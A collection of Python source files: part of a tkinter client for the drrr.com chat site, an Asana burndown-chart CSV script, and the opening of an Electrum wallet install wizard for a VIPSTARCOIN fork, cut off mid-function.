                    # threading.Thread(target=lambda: tkinter.messagebox.showinfo(title='来自%s的私信' % name, message=message['message'])).start()
                    # tkinter.messagebox.showinfo(title='来自%s的私信' % name, message=message['message'])
                    if myname != name and first == 0:
                        threading.Thread(target=private_show, args=(message, name, room_id, id)).start()
                elif myname != name:
                    # Someone else's public message: red bold name.
                    Text.tag_config('name', font=bold_font, foreground='red')
                    Text.insert(tkinter.END, name, 'name')
                else:
                    # Our own message: yellow bold name.
                    Text.tag_config('me', font=bold_font, foreground='yellow')
                    Text.insert(tkinter.END, name, 'me')
                Text.configure(font=font)
                content = ': ' + message['message'] + '\n\n'
                Text.insert(tkinter.END, content)
            elif type == 'me':
                content = ' ✦' + name + ' ' + message['content'] + '\n\n'
                Text.insert(tkinter.END, content)
            elif type == 'roll':
                content = ' ✦' + name + ' 摇到了 ' + message['to']['name'] + '\n\n'
                Text.insert(tkinter.END, content)
            elif type == 'join':
                content = ' ✦' + name + ' logged in.' + '\n\n'
                Text.insert(tkinter.END, content)
                # Membership changed: refresh the member list (skip during
                # the initial snapshot, which replays historic events).
                if not first:
                    users = messages['users']
                    updatelst(lb, host=host)
            elif type == 'leave':
                content = ' ✦' + name + ' ' + message['message'][4:] + '\n\n'
                Text.insert(tkinter.END, content)
                if not first:
                    users = messages['users']
                    updatelst(lb, host=None)
            elif type == 'new-host':
                content = ' ✦' + name + ' is a new host' + '\n\n'
                Text.insert(tkinter.END, content)
                if not first:
                    users = messages['users']
                    updatelst(lb, host=host)
            elif type == 'music':
                content = ' ✦' + name + ' shared music「%s」' % message['music']['name'] + '\n\n'
                music_url = message['music']['url']
                Text.insert(tkinter.END, content)
                # Download/playback happens on its own thread with its own UI.
                threading.Thread(target=play_music, args=(music_url, message['music']['name'])).start()
            elif type == 'kick':
                name = message['to']['name']
                content = ' ✦' + name + ' lost the connection' + '\n\n'
                Text.insert(tkinter.END, content)
                if not first:
                    users = messages['users']
                    updatelst(lb, host=host)
            # Keep the newest line visible.
            Text.see(tkinter.END)
    first = 0
def private_show(message, name, room_id, id):
    """Pop up a small window showing a private message from *name*.

    Runs on its own thread (spawned from parse_message), so it creates its
    own tkinter root and mainloop. The reply entry/button send back to
    sender *id* via private_post, which also closes this window.
    """
    top = tkinter.Tk()
    top.geometry("322x271+526+349")
    top.title("来自%s的私信" % name)
    # Black-on-black themed frame filling the window.
    privateFrame = tkinter.Frame(top)
    privateFrame.place(relx=-0.031, rely=-0.037, relheight=1.089, relwidth=1.071)
    privateFrame.configure(relief='groove',
                           borderwidth="2",
                           background="#000000",
                           width=345,)
    # Read-only-ish text area showing the incoming message.
    privateText = tkinter.Text(privateFrame)
    privateText.place(relx=0.043, rely=0.068, relheight=0.685, relwidth=0.887)
    privateText.configure(background="#000000",
                          foreground="#ffffff",
                          highlightbackground="#d9d9d9",
                          highlightcolor="black",
                          insertbackground="black",
                          selectbackground="#c4c4c4",
                          selectforeground="black",
                          width=304,
                          wrap='word',)
    # Reply entry; <Return> and the send button both go through private_post.
    entry = tkinter.StringVar()
    privateEntry = tkinter.Entry(privateFrame, textvariable=entry)
    privateEntry.place(relx=0.043, rely=0.814, height=27, relwidth=0.742)
    privateEntry.configure(background="#000000",
                           disabledforeground="#a3a3a3",
                           font="TkFixedFont",
                           foreground="#ffffff",
                           insertbackground="#ffffff",
                           relief='groove',
                           width=314,)
    privateEntry.bind('<Return>', handleradaptor(private_post, message=privateEntry, id=id, room_id=room_id, root=top))
    privateButton = tkinter.Button(privateFrame, command=lambda: private_post(event=None, message=privateEntry, id=id, room_id=room_id, root=top))
    privateButton.place(relx=0.783, rely=0.814, height=28, width=55)
    privateButton.configure(activebackground="#ececec",
                            activeforeground="#000000",
                            background="#000000",
                            disabledforeground="#a3a3a3",
                            foreground="#ffffff",
                            highlightbackground="#d9d9d9",
                            highlightcolor="black",
                            pady="0",
                            text='''发送''',
                            width=59,)
    privateText.insert(tkinter.END, name + ": " + message['message'] + '\n')
    top.mainloop()
def handleradaptor(fun, **kwds):
    """Adapter for Tk event handlers: pre-bind keyword arguments.

    (Original comment: 事件处理函数的适配器,相当于中介 — an adapter /
    middleman for event-handler callbacks.) Tk invokes handlers with only
    the event object; this wraps *fun* so the extra keyword arguments are
    supplied automatically.
    """
    def _handler(event, fun=fun, kwds=kwds):
        return fun(event, **kwds)
    return _handler
def private_post(event, message, id, room_id, root):
    """Send the reply typed in Entry *message* privately to user *id*,
    retrying until HTTP 200, then close the popup *root*."""
    text = message.get()
    while True:
        payload = {
            'message': text,
            'url': '',
            'to': id,
        }
        session_headers.update({'method': 'POST',
                                'referer': 'https://drrr.com/room/?id=%s' % room_id})
        response = session.post(url=post_message_url, headers=session_headers, data=payload)
        if response.status_code == 200:
            break
    root.destroy()
flag = 0  # 0 = need a full fetch (json.php?fast=1); 1 = incremental updates only
# Fetch messages: the polling loop run on a background thread.
def get_message(id, Text, room_id, memberlb, queue):
    """Poll the room for messages, render them, and watch *queue* for 'stop'.

    Uses module globals: *message* (last raw response, shared with the
    incremental path), *flag* (0 = do a full fetch, 1 = incremental), and
    *users* (current member list).
    """
    global message, flag, users
    headers = copy.deepcopy(session_headers)
    headers.update({'method': 'GET', 'path': '/json.php?fast=1', 'accept-encoding': None})
    while True:
        if not flag:
            # Initial full fetch of the room state.
            try:
                message = session.get(get_message_url, headers=headers)
                parse_message(message, id, Text=Text, room_id=room_id, lb=memberlb)
                info = json.loads(message.text)
                users = info['users']
                host = info['host']
                updatelst(memberlb, host)
                flag = 1
            except: pass
        else:
            # Incremental fetch driven by the 'update' cursor from the
            # previous response.
            try:
                update = json.loads(message.text)['update']
                url = update_message_url % update
                message = session.get(url, headers=headers)
                parse_message(message, id, Text=Text, room_id=room_id, lb=memberlb)
            except: pass
        # A 'stop' token on the control queue ends the loop (room left).
        if not queue.empty():
            if queue.get_nowait() == 'stop':
                queue.task_done()
                Text.delete(0.0, tkinter.END)
                flag = 0
                break
def get_message_thread(id, Text, room_id, memberlb, queue):
    """Run the get_message polling loop on a background daemon thread.

    Args:
        id: This client's display name (passed through to parse_message).
        Text: Chat tkinter.Text widget to render messages into.
        room_id: Current room id.
        memberlb: Member-list listbox to refresh.
        queue: Control queue; put 'stop' on it to end the polling loop.
    """
    thread = threading.Thread(
        target=get_message, args=(id, Text, room_id, memberlb, queue))
    # Thread.setDaemon() is deprecated since Python 3.10; assign the
    # attribute instead (identical behavior).
    thread.daemon = True
    thread.start()
users = []    # current room members; refreshed by get_message/parse_message
message = ''  # last raw polling response shared between full and incremental fetches
def updatelst(memberlb, host):
    """Repopulate the member listbox from the global *users*, marking the
    entry whose id equals *host* as the room host."""
    memberlb.delete(0, len(users) + 1)
    for user in users:
        prefix = '--host--<' if user['id'] == host else '--------<'
        memberlb.insert(tkinter.END, (prefix, user['name'], '>------------------'))
def update_rooms(roomlb):
    """Repopulate *roomlb* with the zh-CN rooms from the global *rooms*."""
    roomlb.delete(0, len(rooms) + 1)
    for room in rooms:
        try:
            if room['language'] == 'zh-CN':
                label = '<' + room['name'] + ' %s/%s' % (room['total'], room['limit']) + '>------------------'
                roomlb.insert(tkinter.END, label)
        except:
            # Rooms missing expected keys are silently skipped.
            pass
# def get_room_thread(roomlb):
#
# def get_rooms(roomlb):
# global rooms
# login_header.update({'Referer': 'https://drrr.com/lounge/'})
# room = session.get('https://drrr.com/lounge?api=json', headers=login_header)
# rooms = json.loads(room.text)['rooms']
# update_rooms(roomlb)
# timer = threading.Timer(5, get_rooms, args=(roomlb, ))
# timer.setDaemon(True)
# timer.start()
#
# timer = threading.Timer(5, get_rooms, args=(roomlb,))
# timer.setDaemon(True)
# timer.start()
rooms = []  # lounge room listing; refreshed by the get_room_thread poller
def get_room_thread(roomlb):
    """Refresh the lounge room list into *roomlb* every 5 s on a daemon thread."""
    def get_room(roomlb):
        # Poll forever: update the module-global *rooms*, then redraw the listbox.
        global rooms
        login_header.update({'Referer': 'https://drrr.com/lounge/'})
        while True:
            room = session.get('https://drrr.com/lounge?api=json', headers=login_header)
            rooms = json.loads(room.text)['rooms']
            update_rooms(roomlb)
            time.sleep(5)
    room_thread = threading.Thread(target=get_room, args=(roomlb, ))
    # Thread.setDaemon() is deprecated since Python 3.10; assign the
    # attribute instead (identical behavior).
    room_thread.daemon = True
    room_thread.start()
volume = 0  # current playback volume level shared by the +/- buttons and play_music
def play_music(music_url, music_name):
    """Ask the user whether to play *music_name*; on yes, download the file
    to ./mp3/, start playback via minimu, and show a small controller window.

    Runs on its own thread (spawned from parse_message), so it owns its
    own tkinter root and mainloop. Assumes the ./mp3/ directory exists.
    """
    answer = tkinter.messagebox.askquestion("播放音乐", "是否播放<%s>" % music_name)
    if answer == 'yes':
        global volume
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36',
        }
        # Download the whole track before starting playback.
        response = requests.get(url=music_url, headers=headers)
        with open('./mp3/%s.mp3' % music_name, 'wb+') as f:
            f.write(response.content)
        import minimu  # imported lazily: only needed once the user agrees to play
        song = minimu.load('./mp3/%s.mp3' % music_name)
        volume = 20
        song.volume(volume)
        song.play()
        # Controller window: resume / pause / stop / replay / volume +/- buttons.
        music_root = tkinter.Tk()
        music_root.geometry("322x47+162+348")
        music_root.title(music_name)
        music_root.resizable(0, 0)
        try:
            music_root.iconbitmap("./drrr.ico")
        except: pass
        music_root.configure(relief="groove")
        music_root.configure(background="#000000")
        # 恢复 (resume) button
        playButton = tkinter.Button(music_root, command=lambda: resume(song))
        playButton.place(relx=0.031, rely=0.213, height=28, width=49)
        playButton.configure(activebackground="#ececec",
                             activeforeground="#000000",
                             background="#000000",
                             disabledforeground="#a3a3a3",
                             foreground="#ffffff",
                             highlightbackground="#d9d9d9",
                             highlightcolor="black",
                             pady="0",
                             relief='groove',
                             text='''恢复''',)
        # 暂停 (pause) button
        pauseButton = tkinter.Button(music_root, command=lambda: pause(song))
        pauseButton.place(relx=0.248, rely=0.213, height=28, width=49)
        pauseButton.configure(activebackground="#ececec",
                              activeforeground="#000000",
                              background="#000000",
                              disabledforeground="#a3a3a3",
                              foreground="#ffffff",
                              highlightbackground="#d9d9d9",
                              highlightcolor="black",
                              pady="0",
                              relief='groove',
                              text='''暂停''',)
        # 停止 (stop) button — also closes this controller window
        stopButton = tkinter.Button(music_root, command=lambda: stop(song, music_root))
        stopButton.place(relx=0.466, rely=0.213, height=28, width=49)
        stopButton.configure(activebackground="#ececec",
                             activeforeground="#000000",
                             background="#000000",
                             disabledforeground="#a3a3a3",
                             foreground="#ffffff",
                             highlightbackground="#d9d9d9",
                             highlightcolor="black",
                             pady="0",
                             relief='groove',
                             text='''停止''',)
        # 重放 (replay) button
        renewButton = tkinter.Button(music_root, command=lambda: renew(song))
        renewButton.place(relx=0.683, rely=0.213, height=28, width=49)
        renewButton.configure(activebackground="#ececec",
                              activeforeground="#000000",
                              background="#000000",
                              disabledforeground="#a3a3a3",
                              foreground="#ffffff",
                              highlightbackground="#d9d9d9",
                              highlightcolor="black",
                              pady="0",
                              relief='groove',
                              text='''重放''',)
        # Volume up button
        upButton = tkinter.Button(music_root, command=lambda: volume_up(song, volume))
        upButton.place(relx=0.885, rely=0.213, height=15, width=25)
        upButton.configure(activebackground="#ececec",
                           activeforeground="#000000",
                           background="#000000",
                           disabledforeground="#a3a3a3",
                           foreground="#ffffff",
                           highlightbackground="#d9d9d9",
                           highlightcolor="black",
                           pady="0",
                           relief='groove',
                           width=39,
                           text='''+''',)
        # Volume down button
        downButton = tkinter.Button(music_root, command=lambda: volume_down(song, volume))
        downButton.place(relx=0.885, rely=0.5, height=15, width=25)
        downButton.configure(activebackground="#ececec",
                             activeforeground="#000000",
                             background="#000000",
                             disabledforeground="#a3a3a3",
                             foreground="#ffffff",
                             highlightbackground="#d9d9d9",
                             highlightcolor="black",
                             pady="0",
                             relief='groove',
                             width=20,
                             text='''-''',)
        music_root.mainloop()
def resume(song):
    """Resume playback of a paused *song*."""
    song.resume()
def pause(song):
    """Pause playback of *song*."""
    song.pause()
def stop(song, music_root):
    """Stop playback of *song* and close the controller window."""
    song.stop()
    music_root.destroy()
def renew(song):
    """Restart *song* from the beginning (stop, then play again)."""
    song.stop()
    song.play()
def volume_up(song, vol):
    """Raise the playback volume by 5 while the global level is below 100.

    NOTE(review): the guard reads the *global* volume but the increment
    uses the passed-in *vol*, whereas volume_down does the opposite —
    looks inconsistent; confirm intended.
    """
    global volume
    if volume < 100:
        volume = vol + 5
        song.volume(volume)
def volume_down(song, vol):
    """Lower the playback volume by 5 while the passed-in level is above 0.

    NOTE(review): unlike volume_up, the guard here checks the parameter
    *vol* rather than the global level — confirm intended.
    """
    global volume
    if vol > 0:
        volume = vol - 5
        song.volume(volume)
|
asana_burndown.py | #!/usr/bin/env python
"""Convert Asana data into a day-by-day CSV file to generate a burndown chart.
Usage: asana_burndown.py <API_KEY>
Reads Asana's exported JSON from stdin. Writes CSV data to stdout that can be
imported into a spreadsheet (e.g. Google Sheets) to generate a burndown chart.
Inspired by https://github.com/ckalima/asana-tools
Asana API docs:
https://asana.com/developers/documentation/getting-started
https://asana.com/developers/api-reference
"""
import base64
import collections
import csv
import datetime
import itertools
import json
import sys
import threading
import urllib2
# Priority tags recognized on tasks; 'Z' is the placeholder for untagged
# tasks so they sort after P0-P2.
PRIORITIES = ('P0', 'P1', 'P2', 'Z')
# Point value assumed for tasks that carry no explicit '<N>pts' tag.
DEFAULT_SIZE = 2.0
# Cutoff date: tasks whose last change is on/before this count toward the
# 'original' ledger in main(); later ones count as 'extra'.
START = datetime.date(2015, 5, 12)
def parse(date_str):
    """Parse an Asana ISO-8601 UTC timestamp such as '2015-05-08T19:35:22.842Z'."""
    fmt = '%Y-%m-%dT%H:%M:%S.%fZ'
    return datetime.datetime.strptime(date_str, fmt)
def main():
  """Fetch per-task history from Asana and emit day-by-day burndown CSV.

  Reads the Asana JSON export from stdin (API key in argv[1]) and writes
  tab-separated rows to stdout: one row per weekday with the completed
  total plus original/new point sums for each priority.
  """
  tasks = {t['id']: t for t in json.load(sys.stdin)['data']}

  #
  # step 1: fetch history of each task from Asana API
  #
  headers = {'Authorization': 'Basic %s' %
             base64.encodestring('%s:' % sys.argv[1]).replace('\n', '')}

  # maps task id (int) to list of story dicts
  history = {}
  history_lock = threading.Lock()

  # example story:
  # {
  #   "created_at" : "2015-05-08T19:35:22.842Z",
  #   "type" : "system",
  #   "created_by" : {
  #     "name" : "Nish Bhat",
  #     "id" : 6503456116052
  #   },
  #   "text" : "added to Bioinformatics",
  #   "id" : 33571348387449
  # }
  #
  # other possible text: "removed from P2", "completed this task", etc
  #
  sys.stderr.write('Fetching task history')

  def get_history(id):
    # One API request per task; runs on its own thread, so writes to the
    # shared dict are serialized through history_lock.
    req = urllib2.Request('https://app.asana.com/api/1.0/tasks/%s/stories' % id,
                          headers=headers)
    try:
      hist = json.loads(urllib2.urlopen(req).read())['data']
    except urllib2.HTTPError, e:
      print >> sys.stderr, 'Broke on task %r: %s %s' % (
        id, e.code, e.read() or getattr(e, 'body'))
      raise
    with history_lock:
      history[id] = hist
    sys.stderr.write('.')

  threads = []
  for id in tasks:
    thread = threading.Thread(target=get_history, args=(id,))
    threads.append(thread)
    thread.start()
  for thread in threads:
    thread.join()
  sys.stderr.write('\n')

  # uncomment to read/write task history to/from disk
  #
  # with open('/Users/ryan/hist.json', 'w') as f:
  #   f.write(json.dumps(history, indent=2))
  # with open('/Users/ryan/hist.json') as f:
  #   history = {int(k): v for k, v in json.loads(f.read()).items()}

  #
  # step 2: generate calendars of when each task was created and completed
  #
  # these map datetime.date to list of task dicts
  by_created = collections.defaultdict(list)
  by_completed = collections.defaultdict(list)

  for task in tasks.values():
    # record creation and completion date
    created = task['last_change'] = parse(task['created_at']).date()
    by_created[created].append(task)
    if task['completed']:
      by_completed[parse(task['completed_at']).date()].append(task)
    # record priority and size
    task['orig_priority'] = 'Z'  # so it sorts after P*
    task['orig_size'] = DEFAULT_SIZE
    for tag in task.get('tags', []):
      name = tag['name']
      if name in PRIORITIES:
        task['orig_priority'] = name
      elif name.endswith('pts'):
        task['orig_size'] = float(name[:-3].strip())
    task['cur_priority'] = task['orig_priority']
    task['cur_size'] = task['orig_size']

  #
  # step 3: generate calendar of when tasks changed priority or size
  #
  # these map datetime.date to dict of task id to string priority or float size
  changed_priority = collections.defaultdict(dict)
  changed_size = collections.defaultdict(dict)

  for id, stories in history.items():
    # Replay stories in chronological order so later changes win.
    for story in sorted(stories, key=lambda s: parse(s['created_at'])):
      if story['type'] != 'system':
        continue
      prefix = 'added to '
      if story['text'].startswith(prefix):
        tag = story['text'][len(prefix):]
        date = parse(story['created_at']).date()
        if tag in PRIORITIES:
          changed_priority[date][id] = tag
        elif tag.endswith('pts'):
          changed_size[date][id] = float(tag[:-3].strip())

  #
  # step 4: walk dates, keep track of point sums per priority, and write CSV rows
  #
  # these map priority (including None) to point sum; 'original' is scope
  # that existed on/before START, 'extra' is scope added later.
  original = collections.defaultdict(float)
  extra = collections.defaultdict(float)
  complete = 0

  # CSV header
  writer = csv.writer(sys.stdout, delimiter='\t')
  priorities = tuple(itertools.chain(*((p, p + ' new') for p in PRIORITIES)))
  writer.writerow(('Date', 'Complete') + priorities)

  day = datetime.timedelta(days=1)
  cur = min(min(by_completed), START - day)
  end = max(by_completed)

  def from_ledger(task):
    # Ledger a task's points currently live in, per its last change date.
    return original if task['last_change'] <= START else extra

  while cur <= end:
    cur += day
    to_ledger = original if cur <= START else extra
    for task in by_created[cur]:
      to_ledger[task['cur_priority']] += task['cur_size']
    for task in by_completed[cur - day]:  # count tasks completed on the day *after*
      from_ledger(task)[task['cur_priority']] -= task['cur_size']
      if cur >= START:
        complete += task['cur_size']
    # Move points between priorities/ledgers for tasks retagged today.
    for id, new_priority in changed_priority[cur].items():
      task = tasks[id]
      to_ledger[new_priority] += task['cur_size']
      from_ledger(task)[task['cur_priority']] -= task['cur_size']
      task['cur_priority'] = new_priority
      task['last_change'] = cur
    for id, new_size in changed_size[cur].items():
      task = tasks[id]
      to_ledger[task['cur_priority']] += new_size
      from_ledger(task)[task['cur_priority']] -= task['cur_size']
      task['cur_size'] = new_size
      task['last_change'] = cur
    if cur >= START - day and cur.weekday() < 5:  # not weekend
      priorities = tuple(itertools.chain(*((original[p], extra[p])
                                           for p in PRIORITIES)))
      writer.writerow((cur, complete) + priorities)
# Script entry point: read the Asana export on stdin, write CSV to stdout.
if __name__ == '__main__':
  main()
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
# Prompt shown when choosing a password for a software wallet.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")

# Prompt shown when enabling wallet-file encryption for a hardware wallet.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")

# Help text explaining the script-type prefixes accepted for WIF private keys.
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
                 'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
                 'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n

# Warning shown when a seed passphrase contains unusual whitespace
# (see Electrum issue #4566).
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget visualising an m-of-n multisig configuration.

    Draws ``n`` equal pie slices; the first ``m`` slices are green
    (required signatures), the remainder gray.
    """
    size = 120

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m
        self.n = n

    def set_n(self, n):
        """Set the total number of cosigners and repaint."""
        self.n = n
        self.update()

    def set_m(self, m):
        """Set the number of required signatures and repaint."""
        self.m = m
        self.update()

    def paintEvent(self, event):
        """Render the pie; Qt pie angles are expressed in 1/16 degree."""
        background = self.palette().color(QPalette.Background)
        painter = QPainter()
        painter.begin(self)
        painter.setPen(QPen(background, 7, Qt.SolidLine))
        painter.setRenderHint(QPainter.Antialiasing)
        painter.setBrush(Qt.gray)
        # Span of one slice; identical for every slice, so hoisted out of the loop.
        slice_span = int(16 * 360 * 1 / self.n)
        for slice_idx in range(self.n):
            start_angle = int(16 * 360 * slice_idx / self.n)
            painter.setBrush(Qt.green if slice_idx < self.m else Qt.gray)
            painter.drawPie(self.R, start_angle, slice_span)
        painter.end()
def wizard_dialog(func):
    """Decorator for InstallWizard page methods.

    Runs the wrapped dialog, normalises its return value to a tuple and
    forwards it to the ``run_next`` callback supplied (as a keyword
    argument) by BaseWizard.  If the user presses "Back" (signalled by a
    GoBack exception), the wizard either rewinds one page or, when there
    is nothing to go back to, closes and re-raises.
    """
    import functools  # stdlib; local import keeps the module import block untouched

    # functools.wraps preserves func's __name__/__doc__ on the wrapper,
    # which keeps logging and introspection of wizard pages meaningful.
    @functools.wraps(func)
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]  # type: InstallWizard
        # On the first page the back button acts as "Cancel".
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
            if type(out) is not tuple:
                out = (out,)
            run_next(*out)
        except GoBack:
            if wizard.can_go_back():
                wizard.go_back()
                return
            else:
                wizard.close()
                raise
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised when the selected wallet file is already loaded by the daemon.

    Carries the live wallet instance so the caller can focus the
    existing window instead of opening the file a second time.
    """
    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        self.wallet = wallet
# NOTE: base-class order matters — MessageBoxMixin must precede BaseWizard so
# its show_error is the one found in the MRO (this comment previously referenced
# WindowModalDialog, which is no longer among the bases).
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    """Qt implementation of the wallet creation/restore wizard.

    Combines BaseWizard's state machine with a modal dialog.  Pages are
    swapped in and out of ``main_widget`` via set_layout(); user input is
    driven by a local QEventLoop whose exit code encodes the pressed
    button (0 = cancel/close, 1 = back, 2 = next).
    """

    accept_signal = pyqtSignal()  # emitted by terminate() to close the dialog thread-safely

    def __init__(self, config, app, plugins):
        QDialog.__init__(self, None)
        BaseWizard.__init__(self, config, plugins)
        self.setWindowTitle('Electrum for VIPSTARCOIN - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        # On the very first page "Back" doubles as "Cancel".
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Local event loop: exit codes 0 (rejected/cancel), 1 (back),
        # 2 (next) are interpreted by exec_layout()/select_storage().
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        # Wrap the page content in a scroll area so oversized page layouts
        # don't grow the dialog beyond the screen.
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX.  Lame.
    def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
        """First wizard page: pick a wallet file and decrypt it if needed.

        Returns (path, storage); storage is None when the file does not
        exist yet.  Raises UserCancelled when the user aborts, and
        WalletAlreadyOpenInMemory when the daemon already has the wallet
        loaded.
        """
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(17 * char_width_in_lineedit())
        self.pw_e.setEchoMode(2)  # 2 == QLineEdit.Password (masked input) — presumably; confirm against Qt enum
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum wallet'))
        self.temp_storage = WalletStorage(path, manual_upgrades=True)
        wallet_folder = os.path.dirname(self.temp_storage.path)

        def on_choose():
            # File picker; a selection feeds through on_filename via the
            # textChanged signal on name_e.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)

        def on_filename(filename):
            # Re-evaluate the chosen file: prefer an instance already open
            # in the daemon, otherwise open the storage from disk, then
            # update the status message and password-field visibility.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.temp_storage = wallet_from_memory.storage
                else:
                    self.temp_storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                self.logger.exception('')
                self.temp_storage = None
                self.next_button.setEnabled(False)
            user_needs_to_enter_password = False
            if self.temp_storage:
                if not self.temp_storage.file_exists():
                    msg = _("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                elif not wallet_from_memory:
                    if self.temp_storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        user_needs_to_enter_password = True
                    elif self.temp_storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                          + _("Press 'Next' to create/focus window.")
            else:
                msg = _('Cannot read file')
            self.msg_label.setText(msg)
            if user_needs_to_enter_password:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()

        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.temp_storage.path)
        self.name_e.setText(n)  # triggers on_filename for the initial path
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                raise UserCancelled
            if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
                break
            if not self.temp_storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
            if wallet_from_memory:
                raise WalletAlreadyOpenInMemory(wallet_from_memory)
            if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
                if self.temp_storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.temp_storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        # Wrong password: show the error and let the user retry.
                        self.show_message(title=_('Error'), msg=str(e))
                        continue
                    except BaseException as e:
